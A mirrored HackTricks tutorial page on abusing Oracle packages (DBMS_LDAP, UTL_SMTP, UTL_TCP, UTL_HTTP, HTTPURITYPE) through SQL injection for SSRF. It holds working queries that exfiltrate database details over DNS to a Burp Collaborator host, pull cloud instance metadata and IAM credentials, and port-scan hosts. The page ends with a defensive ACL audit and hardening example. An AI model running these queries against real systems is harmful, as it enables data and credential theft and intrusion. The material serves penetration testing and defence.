mirror of
https://github.com/carlospolop/hacktricks
synced 2024-12-13 06:42:54 +00:00
169 lines
10 KiB
Markdown
# Oracle Injection

<details>

<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>

Other ways to support HackTricks:

* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF**, check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.

</details>

**Copy of the posts, taken from the Wayback Machine, of the deleted post at [https://ibreak.software/2020/06/using-sql-injection-to-perform-ssrf-xspa-attacks/](https://ibreak.software/2020/06/using-sql-injection-to-perform-ssrf-xspa-attacks/)**.

## SSRF

Using Oracle to make Out of Band HTTP and DNS requests is well documented, but mostly as a means of exfiltrating SQL data during an injection. We can always adapt these techniques/modules to perform other SSRF/XSPA requests.

Setting up Oracle can be very painful, especially if you want a quick instance just to try out commands. My friend and colleague at [Appsecco](https://appsecco.com), [Abhisek Datta](https://github.com/abhisek), pointed me to [https://github.com/MaksymBilenko/docker-oracle-12c](https://github.com/MaksymBilenko/docker-oracle-12c), which allowed me to set up an instance on a t2.large AWS Ubuntu machine with Docker.

I ran the docker command with the `--network="host"` flag so that I could mimic Oracle as a native install with full network access for the duration of this blog post.

```
docker run -d --network="host" quay.io/maksymbilenko/oracle-12c
```

#### Oracle packages that support a URL or a Hostname/Port Number specification <a href="#oracle-packages-that-support-a-url-or-a-hostname-port-number-specification" id="oracle-packages-that-support-a-url-or-a-hostname-port-number-specification"></a>

To find any packages and functions that accept a hostname and port number, I ran a Google search against the [Oracle Database Online Documentation](https://docs.oracle.com/database/121/index.html). Specifically,

```
site:docs.oracle.com inurl:"/database/121/ARPLS" "host"|"hostname" "port"|"portnum"
```

The search returned the following results (not all of them can be used to make outbound network connections):

* DBMS\_NETWORK\_ACL\_ADMIN
* UTL\_SMTP
* DBMS\_XDB
* DBMS\_SCHEDULER
* DBMS\_XDB\_CONFIG
* DBMS\_AQ
* UTL\_MAIL
* DBMS\_AQELM
* DBMS\_NETWORK\_ACL\_UTILITY
* DBMS\_MGD\_ID\_UTL
* UTL\_TCP
* DBMS\_MGWADM
* DBMS\_STREAMS\_ADM
* UTL\_HTTP

This crude search obviously misses packages like `DBMS_LDAP` (which does accept a hostname and port number), because its [documentation page](https://docs.oracle.com/database/121/ARPLS/d\_ldap.htm#ARPLS360) simply points you to a [different location](https://docs.oracle.com/database/121/ARPLS/d\_ldap.htm#ARPLS360). So there may be other Oracle packages that can be abused to make outbound requests which I have overlooked.

In any case, let's take a look at some of the packages that we have discovered and listed above.

**DBMS\_LDAP.INIT**

The `DBMS_LDAP` package allows access to data on LDAP servers. Its `init()` function initializes a session with an LDAP server and takes a hostname and a port number as arguments.

This function has been documented before to show exfiltration of data over DNS, like below

```
SELECT DBMS_LDAP.INIT((SELECT version FROM v$instance)||'.'||(SELECT user FROM dual)||'.'||(select name from V$database)||'.'||'d4iqio0n80d5j4yg7mpu6oeif9l09p.burpcollaborator.net',80) FROM dual;
```

However, given that the function accepts a hostname and a port number as arguments, it can also be used as a port scanner.

Here are a few examples

```
SELECT DBMS_LDAP.INIT('scanme.nmap.org',22) FROM dual;
SELECT DBMS_LDAP.INIT('scanme.nmap.org',25) FROM dual;
SELECT DBMS_LDAP.INIT('scanme.nmap.org',80) FROM dual;
SELECT DBMS_LDAP.INIT('scanme.nmap.org',8080) FROM dual;
```

An `ORA-31203: DBMS_LDAP: PL/SQL - Init Failed.` shows that the port is closed, while a returned session value indicates that the port is open.

**UTL\_SMTP**

The `UTL_SMTP` package is designed for sending e-mails over SMTP. The example on the [Oracle documentation site shows how you can use this package to send an e-mail](https://docs.oracle.com/database/121/ARPLS/u\_smtp.htm#ARPLS71478). For us, however, the interesting part is the ability to provide a host and port specification.

A crude example using the `UTL_SMTP.OPEN_CONNECTION` function, with a timeout of 2 seconds, is shown below

```
DECLARE c utl_smtp.connection;
BEGIN
c := UTL_SMTP.OPEN_CONNECTION('scanme.nmap.org',80,2);
END;
```

```
DECLARE c utl_smtp.connection;
BEGIN
c := UTL_SMTP.OPEN_CONNECTION('scanme.nmap.org',8080,2);
END;
```

An `ORA-29276: transfer timeout` shows that the port is open but no SMTP connection was established, while an `ORA-29278: SMTP transient error: 421 Service not available` shows that the port is closed.

**UTL\_TCP**

The `UTL_TCP` package and its procedures and functions allow [TCP/IP based communication with services](https://docs.oracle.com/cd/B28359\_01/appdev.111/b28419/u\_tcp.htm#i1004190). If programmed for a specific service, this package can easily become a way into the network or a means of performing full Server Side Requests, since every aspect of the TCP/IP connection can be controlled.

The example [on the Oracle documentation site shows how you can use this package to make a raw TCP connection and fetch a web page](https://docs.oracle.com/cd/B28359\_01/appdev.111/b28419/u\_tcp.htm#i1004190). We can simplify it a little and use it to make requests to the instance metadata service, for example, or to any arbitrary TCP/IP service.

```
SET SERVEROUTPUT ON SIZE 30000

DECLARE
  c      utl_tcp.connection;
  retval pls_integer;
BEGIN
  -- raw TCP connection to the metadata endpoint, 2 second transmit timeout
  c := utl_tcp.open_connection('169.254.169.254',80,tx_timeout => 2);
  -- minimal HTTP/1.0 request; the empty write_line ends the header block
  retval := utl_tcp.write_line(c, 'GET /latest/meta-data/ HTTP/1.0');
  retval := utl_tcp.write_line(c);
  BEGIN
    -- print the response line by line until the server closes the socket
    LOOP
      dbms_output.put_line(utl_tcp.get_line(c, TRUE));
    END LOOP;
  EXCEPTION
    WHEN utl_tcp.end_of_input THEN
      NULL;
  END;
  utl_tcp.close_connection(c);
END;
/
```

```
SET SERVEROUTPUT ON

DECLARE
  c      utl_tcp.connection;
  retval pls_integer;
BEGIN
  -- connect to an arbitrary TCP service (here SSH) with a 4 second timeout
  c := utl_tcp.open_connection('scanme.nmap.org',22,tx_timeout => 4);
  -- send an empty line and read back whatever banner the service returns
  retval := utl_tcp.write_line(c);
  BEGIN
    LOOP
      dbms_output.put_line(utl_tcp.get_line(c, TRUE));
    END LOOP;
  EXCEPTION
    WHEN utl_tcp.end_of_input THEN
      NULL;
  END;
  utl_tcp.close_connection(c);
END;
/
```

Interestingly, because raw TCP requests can be crafted, this package can also be used to query the instance metadata service of every cloud provider, since the HTTP method and any additional headers can all be passed inside the TCP request.

**UTL\_HTTP and Web Requests**

Perhaps the most common and widely documented technique in every Out of Band Oracle SQL Injection tutorial is the [`UTL_HTTP` package](https://docs.oracle.com/database/121/ARPLS/u\_http.htm#ARPLS070). The documentation defines this package as follows: `The UTL_HTTP package makes Hypertext Transfer Protocol (HTTP) callouts from SQL and PL/SQL. You can use it to access data on the Internet over HTTP.`

```
select UTL_HTTP.request('http://169.254.169.254/latest/meta-data/iam/security-credentials/adminrole') from dual;
```

You can additionally use it for some rudimentary port scanning with queries like

```
select UTL_HTTP.request('http://scanme.nmap.org:22') from dual;
select UTL_HTTP.request('http://scanme.nmap.org:8080') from dual;
select UTL_HTTP.request('http://scanme.nmap.org:25') from dual;
```

An `ORA-12541: TNS:no listener` or a `TNS:operation timed out` indicates that the TCP port is closed, whereas an `ORA-29263: HTTP protocol error` or returned data indicates that the port is open.

Another package I have used in the past with varied success is the [`GETCLOB()` method of the `HTTPURITYPE` Oracle abstract type](https://docs.oracle.com/database/121/ARPLS/t\_dburi.htm#ARPLS71705), which lets you interact with a URL and provides support for the HTTP protocol. The `GETCLOB()` method fetches the GET response from a URL as a [CLOB](https://docs.oracle.com/javadb/10.10.1.2/ref/rrefclob.html) data type.

```
select HTTPURITYPE('http://169.254.169.254/latest/meta-data/instance-id').getclob() from dual;
```

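All of the packages above (`UTL_TCP`, `UTL_HTTP`, `UTL_SMTP`, `DBMS_LDAP`, `HTTPURITYPE`) only reach the network when a network ACL grants the calling database user `connect` (or `resolve`) on the target host; otherwise the call fails with `ORA-24247: network access denied by access control list (ACL)`. The audit query and ACL fix below are an added defender-side example, not code from the original post; they assume Oracle 12c or later (the `DBA_HOST_ACES` view and the `xs$ace_type` API), and `APPUSER` plus `smtp.internal.example` are placeholders for the application account and the one host it legitimately needs.

```sql
-- Added example, not from the original post. Assumes Oracle 12c+.
-- APPUSER and smtp.internal.example are placeholders.

-- 1. Which principals may open outbound connections, and to where?
--    host = '*' with NULL ports means "any host, any port": that is the
--    grant that turns the packages above into an SSRF / port-scan primitive,
--    so wildcard entries are sorted to the top.
SELECT host, lower_port, upper_port, principal, principal_type, privilege
  FROM dba_host_aces
 WHERE privilege IN ('connect', 'resolve')
   AND grant_type = 'GRANT'
 ORDER BY CASE WHEN host = '*' THEN 0 ELSE 1 END, host, principal;

-- 2. Does the application account specifically hold a wildcard connect grant?
SELECT COUNT(*) AS wildcard_grants
  FROM dba_host_aces
 WHERE principal  = 'APPUSER'
   AND host       = '*'
   AND privilege  = 'connect'
   AND grant_type = 'GRANT';

-- 3. If step 2 returned a non-zero count, drop the wildcard and replace it
--    with a grant scoped to the single host and port the app really needs.
BEGIN
  DBMS_NETWORK_ACL_ADMIN.REMOVE_HOST_ACE(
    host => '*',
    ace  => xs$ace_type(privilege_list => xs$name_list('connect'),
                        principal_name => 'APPUSER',
                        principal_type => xs_acl.ptype_db));

  DBMS_NETWORK_ACL_ADMIN.APPEND_HOST_ACE(
    host       => 'smtp.internal.example',   -- placeholder relay hostname
    lower_port => 25,
    upper_port => 25,
    ace        => xs$ace_type(privilege_list => xs$name_list('connect'),
                              principal_name => 'APPUSER',
                              principal_type => xs_acl.ptype_db));
END;
/

-- 4. Verify: re-run step 2 (expect 0); a UTL_HTTP.request() to any other
--    host from APPUSER should now raise ORA-24247 instead of returning data.
```

The metadata endpoint `169.254.169.254` needs no ACL entry of its own to be blocked: once no wildcard grant remains, it is denied like every other unlisted host.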